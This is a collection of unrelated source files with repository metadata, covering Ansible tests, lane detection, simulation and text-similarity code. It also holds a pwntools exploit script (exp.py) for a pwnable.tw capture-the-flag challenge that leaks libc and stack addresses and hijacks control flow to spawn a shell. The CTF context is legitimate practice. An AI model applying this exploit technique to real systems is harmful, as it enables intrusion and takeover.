# {"action": {"module": "command", "args": "sh /opt/mysql/hello.sh"}, "name": "execute_file"},
# {"action": {"module": "shell", "args": "sudo sh /opt/mysql/deploy.sh"}, "name": "execute_file"},
# {"action": {"module": "lineinfile", "args": "dest=/opt/mysql/hello.sh line=hello1 regexp=echo state=present"}, "name": "modify_file"},
# {"action": {"module": "lineinfile", "args": "dest=/opt/mysql/world.sh line="" regexp=echo state=present"}, "name": "modify_file"},
# {"action": {"module": "lineinfile", "args": "dest=%s line=sun regexp=echo state=present" % dest}, "name": "modify_file"},
# {"action": {"module": "shell", "args": "lineinfile dest=/opt/mysql/hello.sh regexp=hello insertafter=#echo line=hello world"}, "name": "modify_file"},
# {"action": {"module": "shell", "args": "grep 'cpu ' /proc/stat | awk '{usage\=($2+$4)*100/($2+$4+$5)} END {print usage}'"}, "name": "get_cpu_usage"},
]
ret = runner.run(tasks)
print(ret.results_summary)
print(ret.results_raw)
def TestCommandRunner():
"""
执行单个命令,返回结果
:return:
"""
host_data = [
{
"hostname": "192.168.179.135", #key值
"ip": "192.168.179.135",
# "port": 22,
# "username": "root",
},
]
    inventory = Inventory(host_data)  # regroup the hosts into a virtual group
runner = CommandRunner(inventory)
res = runner.execute('pwd')
# print(res.results_command)
print(res.results_raw,type(res.results_raw))
# res.results_raw
def TestPlayBookRunner():
"""
执行playbook
:return:
"""
host_data = [
{
"hostname": "10.211.55.19",
"ip": "10.211.55.19",
"port": 22,
"username": "root",
},
]
inventory = Inventory(host_data)
runner = PlayBookRunner(inventory).run("/Users/derekwang/test")
print(runner)
if __name__ == "__main__":
# TestAdHocRunner()
TestCommandRunner()
# TestPlayBookRunner()
# Homework:
# Implement create/read/update/delete for hosts.
# When adding a host, first confirm whether the host is online:
# an online host may be added, an offline host may not.
# Use the ansible api.
|
[
"[email protected]"
] | |
840efc99ddd9a5f51a77bb185b52f53a8a51442d
|
2d37d926159b98af115799bbbde066983e0f2c31
|
/combined_color_threshold.py
|
f4320f42c132357f95a99d329d9cf6729e366f1e
|
[] |
no_license
|
eoguzinci/advanced_lane_finding
|
cf01ed9b195aabeb31aac913ed642591ee294551
|
c08ff77ad2cef4bbc26698893b74e6dbe5adac92
|
refs/heads/master
| 2021-09-06T17:23:28.881426 | 2018-02-09T00:09:23 | 2018-02-09T00:09:23 | 104,279,437 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,668 |
py
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
img = mpimg.imread('test3.jpg')
thresh = (180, 255)
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
l_channel = hls[:,:,1]
# Sobel x
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
thresh_min = 20
thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
s_thresh_min = 170
s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
# Plotting thresholded images
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10))
ax1.set_title('Stacked thresholds')
ax1.imshow(color_binary)
ax2.set_title('Combined S channel and gradient thresholds')
ax2.imshow(combined_binary, cmap='gray')
plt.show()
|
[
"[email protected]"
] | |
b9d01644c808a33c9c69100e16e1b4652eec57a9
|
1616b2a7082196182a853ac85a336974f80dc680
|
/Tools/LibEnsemble/warpx_simf.py
|
8822d22efe1fcf163ab6f931080add47b6f9903e
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"BSD-3-Clause-LBNL"
] |
permissive
|
RevathiJambunathan/WarpX
|
a034416ae9369e48bc1f7c2ed95fa6800eb5f522
|
85bc4610adbdd5a48f1cbe666f11db6b72a781c0
|
refs/heads/development
| 2023-09-01T12:49:36.522416 | 2021-01-27T18:02:18 | 2021-01-27T18:02:18 | 174,003,690 | 0 | 4 |
NOASSERTION
| 2023-09-13T00:30:57 | 2019-03-05T18:59:20 |
C++
|
UTF-8
|
Python
| false | false | 4,170 |
py
|
import os
import time
import numpy as np
from libensemble.executors.executor import Executor
from libensemble.message_numbers import WORKER_DONE, TASK_FAILED
from read_sim_output import read_sim_output
from write_sim_input import write_sim_input
"""
This file is part of the suite of scripts to use LibEnsemble on top of WarpX
simulations. It defines a sim_f function that takes LibEnsemble history and
input parameters, runs a WarpX simulation, and returns 'f'.
"""
def run_warpx(H, persis_info, sim_specs, libE_info):
"""
This function runs a WarpX simulation and returns quantity 'f' as well as
    other physical quantities measured in the run, for convenience. A status check
    is performed periodically on the simulation through the Executor provided by LibEnsemble.
"""
# Setting up variables needed for input and output
# keys = variable names
# x = variable values
# libE_output = what will be returned to libE
calc_status = 0 # Returns to worker
input_file = sim_specs['user']['input_filename']
time_limit = sim_specs['user']['sim_kill_minutes'] * 60.0
machine_specs = sim_specs['user']['machine_specs']
exctr = Executor.executor # Get Executor
# Modify WarpX input file with input parameters calculated by gen_f
# and passed to this sim_f.
write_sim_input(input_file, H['x'])
# Passed to command line in addition to the executable.
# Here, only input file
app_args = input_file
os.environ["OMP_NUM_THREADS"] = machine_specs['OMP_NUM_THREADS']
# Launch the executor to actually run the WarpX simulation
if machine_specs['name'] == 'summit':
task = exctr.submit(calc_type='sim',
extra_args=machine_specs['extra_args'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
else:
task = exctr.submit(calc_type='sim',
num_procs=machine_specs['cores'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
# Periodically check the status of the simulation
poll_interval = 1 # secs
while(not task.finished):
time.sleep(poll_interval)
task.poll()
if task.runtime > time_limit:
task.kill() # Timeout
# Set calc_status with optional prints.
if task.finished:
if task.state == 'FINISHED':
calc_status = WORKER_DONE
elif task.state == 'FAILED':
print("Warning: Task {} failed: Error code {}"
.format(task.name, task.errcode))
calc_status = TASK_FAILED
elif task.state == 'USER_KILLED':
print("Warning: Task {} has been killed"
.format(task.name))
else:
print("Warning: Task {} in unknown state {}. Error code {}"
.format(task.name, task.state, task.errcode))
# Safety
time.sleep(0.2)
# Get output from a run and delete output files
warpx_out = read_sim_output(task.workdir)
# Excluding results - NaN - from runs where beam was lost
if (warpx_out[0] != warpx_out[0]):
print(task.workdir, ' output led to NaN values (beam was lost or run did not finish)')
# Pass the sim output values to LibEnsemble.
# When optimization is ON, 'f' is then passed to the generating function
# gen_f to generate new inputs for next runs.
# All other parameters are here just for convenience.
libE_output = np.zeros(1, dtype=sim_specs['out'])
libE_output['f'] = warpx_out[0]
libE_output['energy_std'] = warpx_out[1]
libE_output['energy_avg'] = warpx_out[2]
libE_output['charge'] = warpx_out[3]
libE_output['emittance'] = warpx_out[4]
libE_output['ramp_down_1'] = H['x'][0][0]
libE_output['ramp_down_2'] = H['x'][0][1]
libE_output['zlens_1'] = H['x'][0][2]
libE_output['adjust_factor'] = H['x'][0][3]
return libE_output, persis_info, calc_status
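# Editor's sketch (an assumption inferred from the keys read above, not part of
# the original script): the sim_specs passed to run_warpx is expected to look
# roughly like the following, where the concrete values (file name, 10 minutes,
# 4 cores, 2 threads) are purely illustrative:
#
# sim_specs = {
#     'user': {
#         'input_filename': 'inputs',
#         'sim_kill_minutes': 10,
#         'machine_specs': {
#             'name': 'local',
#             'cores': 4,
#             'OMP_NUM_THREADS': '2',
#         },
#     },
#     'out': [('f', float), ('energy_std', float), ('energy_avg', float),
#             ('charge', float), ('emittance', float), ('ramp_down_1', float),
#             ('ramp_down_2', float), ('zlens_1', float), ('adjust_factor', float)],
# }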
|
[
"[email protected]"
] | |
84b2147114b80a5def71d56900706a173d972b84
|
8322fc54e79c8311f8503c22236d146f3a9e4c00
|
/day03/02_python列表-list.py
|
ac8ae40a71a92a073eb038858d48346519c45db9
|
[] |
no_license
|
syasky/python
|
c8adae0014d1c3d221771f2ef06948d38aed2b7f
|
e88396503b2c9acaade8753ba6bcc9abbac3d145
|
refs/heads/master
| 2022-11-10T18:16:52.119695 | 2020-06-25T11:41:36 | 2020-06-25T11:41:36 | 274,897,249 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,413 |
py
|
# create a list
list1=[1,2,3,'口罩','cov']
print(list1)
print(type(list1))
list2=[1,2,3,4]
print(list2)
list3=['a','b','c','d']
print(list3)
str1='hello'
list4=[str1,True,1,None,list3]
print(list4)
print('--------------------------------------------------------------')
'''
Store three groups of data in one variable:
group 1: 一万, 二万, 三万
group 2: 四条, 五条, 六条
group 3: 七筒, 八筒, 九筒
'''
mahjong = [
['一万','二万','三万'],
['四条','五条','六条'],
['七筒','八筒','九筒']
]
# mahjong is a two-dimensional list
print(mahjong)
# three-dimensional array
threeD=[mahjong,mahjong]
print(threeD)
print('===============操作===============')
#---------- 1. Creating lists ----------
# to quickly create a list of single-character values from a plain string, use list(str)
list5=['a','b','c']
print(list5)
list6=list('abcdefg123')
print(list6)
# can a number be put directly inside list()?
# list(123) is not allowed: a number is not iterable, so list() cannot convert it to a list
# creating a list whose items are not single characters
# converting from a string
# str.split('x') splits str on 'x' into a list
list7='熊大/熊二/熊三'.split('/')
print(list7)
#---------- 2. Reading a list ----------
# use an index (also called a subscript); 0 refers to the first element
list8=[2,3,4,'a','b','c']
# read the value 2
print(list8[0])
# read 'a'
print(list8[3])
# read 'c'; indexing also works backwards, and the last element is -1
print(list8[-1])
# suppose we do not know how many items list8 has and try to read the 10th one
#print(list8[9])  would raise an IndexError
# len() returns the number of values in a list, i.e. its length
print(len(list8))
#-- we can read not just a single item but a whole slice of items
'''
Syntax: list[start:end:step]
start: the starting position; if omitted, defaults to 0 (the beginning)
end: the ending position (exclusive); if omitted, defaults to the end + 1
step: the step size for reading; defaults to 1, and can be negative to read backwards
'''
list9=[1,2,3,4,5,6,7,8,9,10]
#list9=range(1,11)
# read the even numbers from list9
print(list9[1:10:2])
print(list9[1:100:2])
print(list9[1::2])
# if the list is long and we still want to slice to the end but counting is tedious, use len()
print(list9[1:len(list9):2])
# print list9 in reverse order
print(list9[-1::-1])
# print(list9[10::-1])
print(list9[::-1])
print(list9[len(list9)::-1])
# read 8 6 4 2
print(list9[-3::-2])
print(list9[len(list9)-3::-2])
# take 2 4 6 8 forwards, then reverse it
print(list9[1:-2:2][::-1])
# sometimes we need to read data relative to the position of a value xxx
# e.g. read the next few items starting from a certain value
# the three items starting at 5
print(list9.index(5))
print(list9[list9.index(5):list9.index(5)+3])
# starting from a certain character of a string
str2='abcdefghij'
print(str2.find('d'))
#---------- 3. Updating a list ----------
print('----------3.更新列表----------')
list10=[10,20,30]
# append data to the end of xxx
# syntax: xxx.append(yy) adds yy to the end of list xxx
# append 40 to the end
list10.append(40)
print(list10)
# any data type can be appended
list10.append(['a','b','c'])
print(list10)
# xxx.insert(index, yy) puts yy at position index of xxx
list10.insert(0,1)
print(list10)
list10.insert(len(list10),'d')
print(list10)
# modify data: xxx[index] = 'new value'
# e.g. change 1 to 1024; think of it as pointing that index of list10 at a different memory address
list10[0]=1024
print(list10)
# the same value has the same memory address
a=10
print(id(a))
b=10
print(id(b))
print(id(list10[1]))
ss=['a','b','c']
print(id(ss))
print(id(list10[5]))
ss1=['f','g']
list10.append(ss1)
print(list10)
print(id(ss1))
print(id(list10[-1]))
ss1[0]='ffffffffffff'
print(list10)
#---------- 4. Deleting data ----------
# syntax: del xxx[index]; "del" is short for the word delete
del list10[0]
print(list10)
# the whole list10 can also be deleted to free the memory
del list10
# operating on list10 after deletion raises an error
# print(list10)
#---------- 5. List operators ----------
# + concatenates lists
aa=[1,2,3]
bb=['4',5,6]
cc=aa+bb
print(cc)
# * repeats the list that many times
shasha=aa*2
print(shasha)
# in: think of it as looking for someone in a classroom; 'xx in yy' is mostly used with if
classroom=['张三','李四','王五']
flag=('李四' in classroom)
print(flag)
print('李四' in classroom)
flag2=('沙沙' in classroom)
print(flag2)
#if
if '张三' in classroom:
print('请你吃饭')
|
[
"[email protected]"
] | |
6e2571379cdcc6fc301ab69841937b6e9b34e72b
|
d8f3997fb9da5c8898a8a1258c64e5239410139e
|
/lab1_5.py
|
c6c6748ff997b3d07e52959e60add3a7f40cb44a
|
[] |
no_license
|
keerthikapopuri/Python
|
9dad324e99fe1ba28ddce4569c95980726575519
|
2187c7b451954f9f15ddf5e92dc47d447b1106d7
|
refs/heads/main
| 2023-06-14T20:11:09.522539 | 2021-07-13T06:18:06 | 2021-07-13T06:18:06 | 385,497,054 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 104 |
py
|
a=int(input("enter a: "))
b=int(input("enter b: "))
temp=a
a=b
b=temp
print("after swapping")
print(a,b)
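# Editor's note (hedged addition, not part of the original lab): Python can also
# swap two values without a temporary variable via tuple unpacking:
#   a, b = b, a
# The temp-variable version above is kept as the lab's intended illustration of
# the classic three-step swap.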
|
[
"[email protected]"
] | |
822489ad746bb4d182fbf9ec11d681882e5fd98e
|
86ac96d9a9135279fbc50aab6e3fbf12894a4a5b
|
/saxsflow/core/saxs/dataset.py
|
be891e7ca29f78f8c0f3658a3cd833321226fbcb
|
[] |
no_license
|
bm29/workflow
|
7958748ae8c394d8433dd8718079601a55a6294b
|
579d3516edb074f464977d329a8bd3d47651273a
|
refs/heads/master
| 2016-09-06T16:33:00.754126 | 2015-09-18T13:39:52 | 2015-09-18T13:39:52 | 31,201,048 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,095 |
py
|
import json
class SaxsDataset(object):
'''
Biosaxs Dataset
'''
json = None
def __init__(self, jsonRecord):
self.json = json.loads(jsonRecord)
def getInput(self, i=None):
if i is None:
return self.json["INPUT"]
else:
return self.json["INPUT"][i]
def getSubtractions(self, i=None):
if i is None:
return self.json["SUBTRACTIONS"]
else:
return self.json["SUBTRACTIONS"][i]
def getSubtractionFilePathList(self):
subtractions = self.getSubtractions()
filePath = []
for i in range(len(subtractions)):
filePath.append(subtractions[i]["substractedFilePath"])
return filePath
def getMacromolecules(self, i=None):
if i is None:
return self.json["MACROMOLECULES"]
else:
return self.json["MACROMOLECULES"][i]
def getPDBfilePathList(self, i=None):
macromolecules = self.getMacromolecules()
filePath = []
for i in range(len(macromolecules)):
for j in range(len(macromolecules[i]["structure3VOs"])):
structure = macromolecules[i]["structure3VOs"][j]
if structure["structureType"] == "PDB":
filePath.append(structure["filePath"])
return filePath
def setSubtractedfilePath(self, currentFilePath, workingFolderFilePath):
subtractions = self.getSubtractions()
for i in range(len(subtractions)):
if (subtractions[i]["substractedFilePath"]) == currentFilePath:
subtractions[i]["substractedFilePath"] = workingFolderFilePath
def setPDBfilePath(self, currentFilePath, workingFolderFilePath):
macromolecules = self.getMacromolecules()
for i in range(len(macromolecules)):
for j in range(len(macromolecules[i]["structure3VOs"])):
structure = macromolecules[i]["structure3VOs"][j]
if structure["filePath"] == currentFilePath:
structure["filePath"] = workingFolderFilePath
|
[
"[email protected]"
] | |
8e7077c2e98f6f31eb5e6c24d476b9e3254d9bcf
|
873941ffbd49839dd5170c00b51f6e6d1ef51d0c
|
/题目/pwnable.tw/applestore/exp.py
|
d2f5fcd94c67e339bc8174932535f4095c0ba46d
|
[] |
no_license
|
kotorinxn/CTF
|
1fd202838b8e62a5c86f1f483a7452f79a2cfce3
|
c44f93adf5869b234d59854d2384f9b6710fbb79
|
refs/heads/master
| 2021-07-07T17:31:19.167341 | 2020-09-24T19:08:06 | 2020-09-24T19:08:06 | 189,968,976 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,720 |
py
|
from pwn import *
context(os = 'linux',arch = 'i386', log_level = 'debug')
debug = 0
if debug == 1:
p = process('./applestore')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
p = remote('chall.pwnable.tw', 10104)
libc = ELF('libc_32.so.6')
elf = ELF('./applestore')
def add(idx):
p.recvuntil('>')
p.sendline('2')
p.recvuntil('Number>')
p.sendline(str(idx))
def delete(idx):
p.recvuntil('>')
p.sendline('2')
p.recvuntil('Number>')
p.sendline(str(idx))
def leak(addr):
p.recvuntil('>')
p.sendline('4')
p.recvuntil('(y/n) >')
p.sendline('y\x00' + p32(addr) + '\x00' * 4 * 2)
p.recvuntil('27:')
leak_addr = u32(p.recvline()[1:5].ljust(4, '\x00'))
return leak_addr
def aaw(addr, target):
p.recvuntil('>')
p.sendline('3')
p.recvuntil('>')
p.sendline('27' + '\x00' * 4 * 2 + p32(addr - 0xc) + p32(target))
for i in range(6):
add(1)
for i in range(20):
add(2)
#checkout
#gdb.attach(p)
p.recvuntil('>')
p.sendline('5')
p.recvuntil('(y/n) >')
p.sendline('y')
#cart leak libc
#gdb.attach(p)
print_addr = leak(elf.got['printf'])
libc_base = print_addr - libc.symbols['printf']
log.info('libc_addr:' + hex(libc_base))
heap_addr = leak(0x0804B068 + 8)
log.info('heap:' + hex(heap_addr))
#gdb.attach(p)
stack_addr = leak(heap_addr + 0x4a0)
log.info('stack:' + hex(stack_addr))
#control the ebp
aaw(stack_addr + 0x20, stack_addr + 0x40)
p.recvuntil('>')
#p.sendline('6\x00' + p32(stack_addr) + p32(libc_base + libc.symbols['system']) + p32(stack_addr) + p32(libc_base + 0x15ba0b))
p.sendline('6\x00' + p32(stack_addr) + p32(libc_base + libc.symbols['system']) + p32(stack_addr) + p32(libc_base + 0x158e8b))
p.interactive()
|
[
"[email protected]"
] | |
b9f513a4388555b2bd612aad4a47b3229b8af79f
|
78e609d905f189e1df1e015a11bf3f3ae4935977
|
/python.py
|
b6d6fb158d964cf288c0002ab6dcea961ab8382d
|
[] |
no_license
|
VinayakLuha/cautious-octo-sniffle
|
650ab9b68f44a3d7269ffccfd9176f8fc25a0d56
|
b600a68bef45fc3ce6b486db23b82671aee1bbd8
|
refs/heads/master
| 2022-11-14T07:40:19.933419 | 2020-07-05T15:36:01 | 2020-07-05T15:36:01 | 277,231,005 | 0 | 0 | null | 2020-07-05T04:40:01 | 2020-07-05T04:30:27 | null |
UTF-8
|
Python
| false | false | 18 |
py
|
print("HOOOOOOO")
|
[
"[email protected]"
] | |
63459c05f9decea9fb591739d9950284975a7236
|
11594333854f35e942fde4db523a543aa74c6000
|
/Similarities.py
|
ab699aedb9ecf4b6f72de97b2486aad55e137f37
|
[] |
no_license
|
Epsilon456/WordSimilarities
|
2f43ce209470cb17810dee9860abb4b6a835a399
|
5f25cbbb1383dd3fc16a4fa38ea011412df3776e
|
refs/heads/master
| 2023-05-31T22:23:36.937710 | 2019-11-18T21:58:20 | 2019-11-18T21:58:20 | 221,731,186 | 1 | 0 | null | 2023-05-22T22:33:00 | 2019-11-14T15:38:53 |
Python
|
UTF-8
|
Python
| false | false | 17,423 |
py
|
import Levenshtein as LV
import gensim
import pandas as pd
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
"""This script contains a single class which in turn, contains all 5 of the methods to be tested (as well as their
initialization functions.) The five methods are as follows:
1) Jacard Similarity between course descriptions
2) Levenshtein Distance between course names
3) Similarity of the average Word2Vec encoding of course descriptions
4) Similarity of the Doc2Vec encodings of course descriptions.
5) Similarity of the "matrix" encoding using the pretrained GloVe encodings.
(The matrix encoding is a concatenation of 4 encoding vectors:
    1) The average of all word vector encodings in the description
    2) The average + 1 st dev of all vector encodings
    3) A vector consisting of the max values of all vector encodings
    4) A vector consisting of the min values of all vector encodings.)
The methods used to call these are as follows:
Jacard
Lev
WordSim
DocSim
GloveSim
"""
class Similarities:
"""This class takes in a training data frame that is used to train the word2vec and doc2vec embeddings.
    The 5 methods can then be called when passed the test data frame.
Initialize this class with:
trainDF - The dataframe used to train the embeddings. This will also be the dataframe from which
the program will pull the course closest to the test course.
Mode - Either "All" for initializing all 5 methods or "Word" for only initializing "WordSim"
"""
def __init__(self,trainDF,mode="All"):
self.GloveFail = False
self.mode = mode
#The input training data frame.
self.trainDF = trainDF
#Transforms the text strings from the descriptions into a list of list of words.
self._initText()
#Initializes and trains the word2vec embeddings.
self._initWordVec()
#Only initialize DocSim and GloveSim if required.
if mode == "All":
            #Initializes and trains the doc2vec embeddings.
self._initDocVec()
#Loads in the pretrained GloVe data.
self._initGloveVec()
        #Build a dictionary containing the embeddings for each training description. This makes it
        #so that those embeddings only need to be computed once; each test course is then embedded
        #once and compared against the embeddings in this dictionary.
self.VDF = {"Word":{},"Doc":{},"Glove":{}}
self._BuildSims()
def _initText(self):
#Get text from descriptions. The variable is a nested list where the outer list represents
#each description and the inner list is each word in that description.
self.texts = []
for index, row in self.trainDF.iterrows():
self.texts.append(row['description'].split())
print("Text initialized")
def _initWordVec(self):
#Load the list of list consisting of the course descriptions into the word2vec model. Train the model
self.WordVecModel = gensim.models.Word2Vec(self.texts,size=300,window=5,min_count=2,workers=4,iter=100)
print("Word2Vec Model initialized")
def _initDocVec(self):
#Initializes and trains the doc2vec embedding
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
documents = []
#Iterate through each course description and store each as a tagged docuent. Create list of
#tagged documents.
for i in range(len(self.texts)):
documents.append(TaggedDocument(self.texts[i],[i]))
#Train the doc2vec model with the tagged documents.
self.DocVecModel = Doc2Vec(documents, vector_size=300, window=5, min_count=2, workers=4,epochs=100)
print("Doc2Vec Model initialized")
def _initGloveVec(self):
#Initializes the pre-trained GloVe model.
import Setup
import pickle
import os
        #If the model has already been saved, load it from the pickle file and store it in self.gloveModel
if os.path.exists(Setup.gloveJar):
with open(Setup.gloveJar,'rb') as f:
glove = pickle.load(f)
self.gloveModel = glove
#If the model has not already been saved, call the api downloader to download the model.
else:
print("Downloading GloVe word embeddings with gensim...")
"Maybe add an option to switch off pickle mode?"
try:
import gensim.downloader as api
glove = api.load("glove-wiki-gigaword-100")
#Once the model has been downloaded, save the word_vectors as a pickle file for later use.
with open(Setup.gloveJar,'wb') as f:
pickle.dump(glove,f)
print("word vectors saved to .pkl file")
self.gloveModel = glove
print("Glove model initialized")
except:
print("Glove Sim model failed to download")
self.GloveFail = True
#Allow word vectors to be accessed by other methods in the class.
def Jacard(self,testDf,listCourse,inCourse):
"""Calculates the Jacard similarity between two course descriptions.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
The Jacard similarity score scaled between 0 and 1.
"""
        #Obtain the course descriptions for the two course indexes passed into the function.
A = self.trainDF['description'][listCourse]
B = testDf['description'][inCourse]
#Create a set of words for each description.
setA = set(A.split())
setB = set(B.split())
#Count the number of words in set a that are also in set b.
score = 0
for a in setA:
if a in setB:
score +=1
#Divide the number by the total length of both sets.
return score/(len(setA.union(setB)))
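    # Editor's worked example (hypothetical inputs, not from the original file):
    # for descriptions "linear algebra and matrices" vs. "matrices and vectors",
    # setA = {linear, algebra, and, matrices} and setB = {matrices, and, vectors};
    # two words of setA appear in setB and the union holds five distinct words,
    # so Jacard() returns 2/5 = 0.4.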
def Lev(self,testDf,listCourse,inCourse):
"""Calculates the Levenshtein distance between two course names.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
            The complement of the normalized Levenshtein distance
            (The complement is calculated by 1-(L/D) where L is the Levenshtein distance and D is the length of the
            longer of the two strings)
This number is scaled between 0 and 1 where 1 represents a perfect match.
"""
        #Obtain the course names for the two courses provided
A = self.trainDF['name'][listCourse]
B = testDf['name'][inCourse]
#Figure out the length of the longest course name.
maxLen = max(len(A),len(B))
        #Calculate the complement of the normalized Levenshtein distance.
return 1-LV.distance(A,B)/maxLen
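    # Editor's worked example (hypothetical names, not from the original file):
    # for course names "kitten" and "sitting" the Levenshtein distance is 3 and
    # the longer name has 7 characters, so Lev() returns 1 - 3/7 ~ 0.571.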
def _WordSimAveVec(self,df,a):
"""Calculates the a document embedding vector by taking the average of all word vectors in the document. This is
a helper function to be used with the "WordSim" method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Output:
A vector embedding representing the entire document.
"""
#Obtain the course description for the course provided and convert the string into a list of individual words.
Description = df['description'][a].split()
#Create a placeholder zero vector of the same size as the vector embedding.
Vector = np.zeros(self.WordVecModel.layer1_size)
wordCount = 0
#Iterate over each word in the description.
for word in Description:
#If the word is in the trained vocabulary, obtain the word vector.
#Continue to add the word vectors to the placeholder vector to get the running sum.
if word in self.WordVecModel.wv.vocab:
vector = self.WordVecModel.wv.get_vector(word)
Vector +=vector
#Keep track of how many word vectors (which were included in the vocabulary) were added.
wordCount +=1
#Calculate the mean by dividing the sum by the number of vectors.
return Vector/wordCount
def _BuildSims(self):
"""Builds up the dictionary "self.VDF" to contain all of the document vector embeddings which are in
the training dataset to act as a reference. This way, the references only need to be calculated once.
The method will build up the dictionary using 3 "columns" - one for each word embedding if "All" mode
was selected for initializing the class. If "Word" mode was selected, it will only build the dictionary
for the "WordSim" method.
Dictionary will be in the form VDF[Method][courseName]
"""
if self.mode == "All":
#Iterate through all rows of the training dataframe.
for index, _ in self.trainDF.iterrows():
#Obtain the document embeddings for each method.
wordVec = self._WordSimAveVec(self.trainDF,index)
docVec = self._DocSim(self.trainDF,index)
#Save the embeddings to a dictionary
self.VDF["Word"][index] = wordVec
self.VDF["Doc"][index] = docVec
if self.GloveFail == False:
gloveVec = self._GloveSim(self.trainDF,index)
self.VDF["Glove"][index] = gloveVec
if self.mode == "Word":
for index, _ in self.trainDF.iterrows():
wordVec = self._WordSimAveVec(self.trainDF,index)
self.VDF["Word"][index] = wordVec
def WordSim(self,testDF,listCourse,inCourse):
"""Calculate the cosine similarity between two vectors where each vector represents a course
description. Each vector is made by taking the average of each word vector that makes up the description. Average
vectors are calculated by a helper method "_WordSimAveVec"
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Obtain a single vector embedding for each course description (calculated by taking an average of each word
#embedding that makes up each description)
#Get the embedding from the dictionary for the list (reference) course
aVec = self.VDF["Word"][listCourse]
#Calculate the embedding with the doc2Vec model.
bVec = self._WordSimAveVec(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(aVec,0)
B = np.expand_dims(bVec,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _DocSim(self,df,a):
"""Calculate the cosine similarity between two document vectors.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number"""
        #Obtain the description of the input course.
textA = df['description'][a]
        #Obtain the document embedding vector for the description.
vectorA = self.DocVecModel.infer_vector([textA], alpha=0.1, min_alpha=0.0001, steps=300)
return vectorA
def DocSim(self,testDF,listCourse,inCourse):
"""Calculates a vector embedding for a course description using the doc2vec method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Reference the VDF dictionary to get the doc embedding for the listCourse
vectorA = self.VDF["Doc"][listCourse]
#Calculate the doc embedding for the input course
vectorB = self._DocSim(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(vectorA,0)
B = np.expand_dims(vectorB,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _GloveSim(self,testDf,a):
"""Uses the word vectors from the pre-trained GloVe model to generate an array representing the document.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Outputs:
            An array consisting of the mean, mean + 1 st dev, max, and min of all word vector embeddings which
make up the course description."""
#Obtain the course description for the given course number.
doc = testDf['description'][a]
#Iterate over each word in the document. For each word in the GloVe vocab, append the word vector to a list
Vectors = []
        for word in doc.split():
if word in self.gloveModel.vocab:
vector = self.gloveModel.get_vector(word)
Vectors.append(vector)
#Turn the list of vectors into an array.
Vectors = np.array(Vectors)
#Calculate the mean, mean+1stdev, maximum, and minimum of this array (each operation reducing
#the array to eliminate rows). Concatenate these 4 measures into one matrix to serve as an index for a
#document.
sd = np.std(Vectors,axis=0)
a0 = np.average(Vectors,axis=0)
asd = a0+sd
amax = np.max(Vectors,axis=0)
amin = np.amin(Vectors,axis=0)
return np.stack((a0,asd,amax,amin),1)
def GloveSim(self,testDf,listCourse,inCourse):
"""Calculate the cosine similarity between two document arrays.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
Outputs
Cosine similarity"""
        #Obtain the matrix representation of the document encoding for each description. Transpose the matrices
#Obtain the embedding from the dictionary for the list course
